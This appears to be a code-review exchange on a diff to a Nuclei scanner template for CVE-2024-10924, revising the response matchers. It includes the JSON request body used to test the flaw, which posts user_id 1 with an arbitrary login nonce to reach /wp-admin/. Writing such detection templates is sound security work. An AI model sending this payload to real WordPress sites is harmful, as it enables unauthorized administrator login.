nuclei/CVE-2024-10924.yaml

```diff
@@ -28,20 +28,16 @@ http:
         Content-Type: application/json
         Connection: keep-alive
         Content-Length: 89
+
         {
             "user_id": 1,
             "login_nonce": "133333337",
             "redirect_to": "/wp-admin/"
         }
-    matchers-condition: and
     matchers:
       - type: status
         status:
           - 200
       - type: regex
         regex:
-          - '"redirect_to": "\\/wp-admin\\/"'
-          - 'wordpress_logged_in'
-      - type: regex
-        regex:
-          - 'wordpress_logged_in'
\ No newline at end of file
+          - '"redirect_to":\\s*"(\\\\/wp-admin\\\\/)"'
```

Comment:
Waht a second, shouldn't you have `logged_in` to confirm the issue!

Reply:
updated!